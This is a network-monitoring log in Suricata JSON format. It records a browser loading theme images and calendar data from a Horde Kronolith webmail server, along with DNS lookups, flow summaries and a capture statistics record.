{"timestamp":"2020-02-29T00:12:44.494227+0000","flow_id":1404448609633777,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52734,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/kronolith\/themes\/default\/graphics\/dayview.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/kronolith\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":349},"app_proto":"http","fileinfo":{"filename":"\/kronolith\/themes\/default\/graphics\/dayview.png","state":"CLOSED","stored":false,"size":349,"tx_id":9}} {"timestamp":"2020-02-29T00:12:44.494337+0000","flow_id":1572119837955811,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52736,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":3,"http":{"hostname":"mail.spiral.com","url":"\/kronolith\/themes\/default\/graphics\/workweekview.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/kronolith\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":303}} {"timestamp":"2020-02-29T00:12:44.494905+0000","flow_id":1572119837955811,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52736,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/kronolith\/themes\/default\/graphics\/workweekview.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/kronolith\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":303},"app_proto":"http","fileinfo":{"filename":"\/kronolith\/themes\/default\/graphics\/workweekview.png","state":"CLOSED","stored":false,"size":303,"tx_id":3}} {"timestamp":"2020-02-29T00:12:44.495681+0000","flow_id":1404448609633777,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52734,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":10,"http":{"hostname":"mail.spiral.com","url":"\/kronolith\/themes\/default\/graphics\/weekview.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/kronolith\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":303}} {"timestamp":"2020-02-29T00:12:44.496240+0000","flow_id":1572119837955811,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52736,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":4,"http":{"hostname":"mail.spiral.com","url":"\/kronolith\/themes\/default\/graphics\/monthview.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/kronolith\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":358}} {"timestamp":"2020-02-29T00:12:44.496257+0000","flow_id":1404448609633777,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52734,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/kronolith\/themes\/default\/graphics\/weekview.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/kronolith\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":303},"app_proto":"http","fileinfo":{"filename":"\/kronolith\/themes\/default\/graphics\/weekview.png","state":"CLOSED","stored":false,"size":303,"tx_id":10}} {"timestamp":"2020-02-29T00:12:44.496885+0000","flow_id":1404448609633777,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52734,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":11,"http":{"hostname":"mail.spiral.com","url":"\/kronolith\/themes\/default\/graphics\/yearview.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/kronolith\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":301}} {"timestamp":"2020-02-29T00:12:44.496897+0000","flow_id":1572119837955811,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52736,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/kronolith\/themes\/default\/graphics\/monthview.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/kronolith\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":358},"app_proto":"http","fileinfo":{"filename":"\/kronolith\/themes\/default\/graphics\/monthview.png","state":"CLOSED","stored":false,"size":358,"tx_id":4}} 
{"timestamp":"2020-02-29T00:12:44.497615+0000","flow_id":1404448609633777,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52734,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/kronolith\/themes\/default\/graphics\/yearview.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/kronolith\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":301},"app_proto":"http","fileinfo":{"filename":"\/kronolith\/themes\/default\/graphics\/yearview.png","state":"CLOSED","stored":false,"size":301,"tx_id":11}} {"timestamp":"2020-02-29T00:12:44.537309+0000","flow_id":1572119837955811,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52736,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":5,"http":{"hostname":"mail.spiral.com","url":"\/kronolith\/themes\/default\/graphics\/tasks.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/kronolith\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":614}} {"timestamp":"2020-02-29T00:12:44.545353+0000","flow_id":1404448609633777,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52734,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":12,"http":{"hostname":"mail.spiral.com","url":"\/kronolith\/themes\/default\/graphics\/new.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/kronolith\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":560}} 
{"timestamp":"2020-02-29T00:12:44.548279+0000","flow_id":1404448609633777,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52734,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/kronolith\/themes\/default\/graphics\/new.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/kronolith\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":560},"app_proto":"http","fileinfo":{"filename":"\/kronolith\/themes\/default\/graphics\/new.png","state":"CLOSED","stored":false,"size":560,"tx_id":12}} {"timestamp":"2020-02-29T00:12:44.548593+0000","flow_id":1404448609633777,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52734,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":13,"http":{"hostname":"mail.spiral.com","url":"\/kronolith\/themes\/default\/graphics\/favicon.ico","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/vnd.microsoft.icon","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":1742}} {"timestamp":"2020-02-29T00:12:44.600798+0000","flow_id":224552373988062,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":54903,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":64506,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:12:44.634787+0000","flow_id":1404448609633777,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52734,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/kronolith\/themes\/default\/graphics\/favicon.ico","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"image\/vnd.microsoft.icon","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":1742},"app_proto":"http","fileinfo":{"filename":"\/kronolith\/themes\/default\/graphics\/favicon.ico","state":"CLOSED","stored":false,"size":1742,"tx_id":13}} {"timestamp":"2020-02-29T00:12:44.709050+0000","flow_id":224552373988062,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":54903,"proto":"UDP","dns":{"type":"answer","id":64506,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:12:44.709050+0000","flow_id":224552373988062,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":54903,"proto":"UDP","dns":{"type":"answer","id":64506,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:12:44.752880+0000","flow_id":1404448609633777,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52734,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":14,"http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listCalendars","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":639}} {"timestamp":"2020-02-29T00:12:44.752880+0000","flow_id":1404448609633777,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.81","src_port":52734,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listCalendars","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":639},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/kronolith\/listCalendars","state":"CLOSED","stored":false,"size":29,"tx_id":14}} {"timestamp":"2020-02-29T00:12:44.795519+0000","flow_id":1404448609633777,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52734,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listCalendars","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":639},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/kronolith\/listCalendars","state":"CLOSED","stored":false,"size":1692,"tx_id":14}} {"timestamp":"2020-02-29T00:12:44.805646+0000","flow_id":1172073699101454,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":35264,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":24982,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:12:44.820640+0000","flow_id":618010033054210,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52738,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/sounds\/reminder.wav","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"audio\/x-wav","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":23151},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/sounds\/reminder.wav","state":"CLOSED","stored":false,"size":23151,"tx_id":0}} {"timestamp":"2020-02-29T00:12:44.820982+0000","flow_id":618010033054210,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52738,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/kronolith\/themes\/default\/graphics\/loading.gif","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/gif","http_refer":"http:\/\/mail.spiral.com\/kronolith\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":2494}} {"timestamp":"2020-02-29T00:12:44.838775+0000","flow_id":1572119837955811,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52736,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/kronolith\/themes\/default\/graphics\/tasks.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/kronolith\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":614},"app_proto":"http","fileinfo":{"filename":"\/kronolith\/themes\/default\/graphics\/tasks.png","state":"CLOSED","stored":false,"size":614,"tx_id":5}} {"timestamp":"2020-02-29T00:12:44.913873+0000","flow_id":1172073699101454,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":35264,"proto":"UDP","dns":{"type":"answer","id":24982,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} 
{"timestamp":"2020-02-29T00:12:44.913873+0000","flow_id":1172073699101454,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":35264,"proto":"UDP","dns":{"type":"answer","id":24982,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:12:44.958321+0000","flow_id":989009308065649,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":41034,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":56223,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:12:45.000735+0000","flow_id":150206485572827,"event_type":"flow","src_ip":"192.168.10.81","src_port":52726,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":20,"pkts_toclient":12,"bytes_toserver":4491,"bytes_toclient":7846,"start":"2020-02-29T00:11:35.994523+0000","end":"2020-02-29T00:11:43.053860+0000","age":8,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1f","tcp_flags_ts":"1f","tcp_flags_tc":"1b","syn":true,"fin":true,"rst":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:12:45.001038+0000","flow_id":1202052566297535,"event_type":"flow","src_ip":"192.168.10.81","src_port":52724,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":26,"pkts_toclient":25,"bytes_toserver":6852,"bytes_toclient":20641,"start":"2020-02-29T00:11:35.994239+0000","end":"2020-02-29T00:11:43.048709+0000","age":8,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1f","tcp_flags_ts":"1f","tcp_flags_tc":"1a","syn":true,"fin":true,"rst":true,"psh":true,"ack":true,"state":"closed"}} 
{"timestamp":"2020-02-29T00:12:45.001105+0000","flow_id":1062938575886898,"event_type":"flow","src_ip":"192.168.10.130","src_port":34802,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":5,"pkts_toclient":5,"bytes_toserver":1112,"bytes_toclient":890,"start":"2020-02-29T00:11:39.383538+0000","end":"2020-02-29T00:11:44.702752+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:12:45.001326+0000","flow_id":701495603006587,"event_type":"flow","src_ip":"192.168.10.130","src_port":34800,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":23,"pkts_toclient":26,"bytes_toserver":3440,"bytes_toclient":28434,"start":"2020-02-29T00:11:38.232571+0000","end":"2020-02-29T00:11:44.693708+0000","age":6,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:12:45.066699+0000","flow_id":989009308065649,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":41034,"proto":"UDP","dns":{"type":"answer","id":56223,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:12:45.066699+0000","flow_id":989009308065649,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":41034,"proto":"UDP","dns":{"type":"answer","id":56223,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} 
{"timestamp":"2020-02-29T00:12:45.092413+0000","flow_id":1572119837955811,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52736,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":6,"http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listEvents","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":126}} {"timestamp":"2020-02-29T00:12:45.092413+0000","flow_id":1572119837955811,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.81","src_port":52736,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listEvents","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":126},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/kronolith\/listEvents","state":"CLOSED","stored":false,"size":137,"tx_id":6}} {"timestamp":"2020-02-29T00:12:45.107378+0000","flow_id":1404448609633777,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.81","src_port":52734,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listEvents","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":972},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/kronolith\/listEvents","state":"CLOSED","stored":false,"size":128,"tx_id":15}} 
{"timestamp":"2020-02-29T00:12:45.107433+0000","flow_id":1404448609633777,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52734,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":15,"http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listEvents","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":1137}} {"timestamp":"2020-02-29T00:12:47.000497+0000","flow_id":360397875076404,"event_type":"flow","src_ip":"192.168.10.122","src_port":46500,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:07:46.417076+0000","end":"2020-02-29T00:07:46.525040+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:12:49.000552+0000","flow_id":1491464643110889,"event_type":"flow","src_ip":"192.168.10.81","src_port":52728,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":6,"pkts_toclient":4,"bytes_toserver":852,"bytes_toclient":659,"start":"2020-02-29T00:11:43.157673+0000","end":"2020-02-29T00:11:48.161299+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:12:49.822840+0000","flow_id":618010033054210,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52738,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/kronolith\/themes\/default\/graphics\/loading.gif","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"image\/gif","http_refer":"http:\/\/mail.spiral.com\/kronolith\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":2494},"app_proto":"http","fileinfo":{"filename":"\/kronolith\/themes\/default\/graphics\/loading.gif","state":"CLOSED","stored":false,"size":2494,"tx_id":1}} {"timestamp":"2020-02-29T00:12:50.000580+0000","flow_id":1914802374239664,"event_type":"flow","src_ip":"192.168.10.122","src_port":51696,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:07:48.976304+0000","end":"2020-02-29T00:07:49.084348+0000","age":1,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:12:50.097220+0000","flow_id":1572119837955811,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52736,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listEvents","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":126},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/kronolith\/listEvents","state":"CLOSED","stored":false,"size":115,"tx_id":6}} {"timestamp":"2020-02-29T00:12:50.110860+0000","flow_id":1404448609633777,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52734,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listEvents","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":1137},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/kronolith\/listEvents","state":"CLOSED","stored":false,"size":3298,"tx_id":15}} {"timestamp":"2020-02-29T00:12:50.949751+0000","flow_id":1932059572600311,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":49307,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":47381,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:12:50.954845+0000","flow_id":432368661990283,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52746,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/redbox_spinner.gif","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/gif","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":6820}} 
{"timestamp":"2020-02-29T00:12:51.000251+0000","event_type":"stats","stats":{"uptime":14423,"capture":{"kernel_packets":135307,"kernel_drops":0},"decoder":{"pkts":135315,"bytes":93285532,"invalid":187,"ipv4":133822,"ipv6":8,"ethernet":135315,"raw":0,"null":0,"sll":0,"tcp":128534,"udp":5086,"sctp":0,"icmpv4":15,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":689,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7097632},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2764,"ssn_memcap_drop":0,"pseudo":347,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2780,"synack":2771,"rst":1207,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":142,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1803,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":103,"dcerpc_udp":0,"dns_udp":2323,"failed_udp":111},"tx":{"http":4654,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2403}},"flow_mgr":{"closed_pruned":2742,"new_pruned":15,"est_pruned":2367,"bypassed_pruned":0,"flows_checked":1,"flows_notimeout":1,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65535,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":22738,"memcap_state":0,"memcap_global":0},"http":{"memuse":101791,"memcap":0}}} 
